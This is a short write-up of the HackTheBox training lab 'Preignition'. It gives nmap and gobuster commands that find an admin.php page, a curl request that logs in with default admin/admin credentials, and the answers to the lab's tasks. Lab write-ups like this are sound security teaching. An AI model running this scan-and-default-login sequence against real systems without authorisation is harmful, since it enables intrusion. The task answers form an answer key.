HackTheBox Starting Point Tier 0 Preignition

Video Walkthrough

Writeup

nmap <IP> -p80 -sC -sV
Nmap scan showing port 80 open (nginx)
Preignition nmap scan results 
gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://<IP>
Scanning for the admin.php page
Preignition gobuster admin panel 
curl -XPOST http://<IP>/admin.php -d "username=admin&password=admin"
Use curl to login in with the admin credentials
Preignition curl admin login

Tasks

  1. dir busting
  2. -sV
  3. http
  4. nginx 1.14.2
  5. dir
  6. -x php
  7. admin.php
  8. 200